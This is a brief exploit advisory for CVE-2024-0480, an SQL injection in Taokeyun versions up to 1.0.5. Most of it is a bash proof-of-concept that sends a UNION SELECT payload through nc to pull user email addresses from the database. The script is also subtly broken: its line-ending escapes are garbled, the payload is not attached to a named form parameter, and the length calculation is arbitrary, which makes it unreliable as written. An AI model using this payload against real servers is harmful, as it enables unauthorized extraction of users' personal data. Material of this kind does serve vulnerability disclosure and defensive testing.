Authored by Amirhossein Bahramizadeh

Taokeyun versions up to 1.0.5 suffers from a remote SQL injection vulnerability.

advisories | CVE-2024-0480

#!/bin/bash

# Variables
url="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"
cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"

# Construct the request
request="POST $url HTTP/1.1rn"
request+="Content-Type: application/x-www-form-urlencodedrn"
request+="Content-Length: $((${#cid}+15))rnrn"
request+="$cid"

# Send the request
(echo -e "$request") | nc example.com 80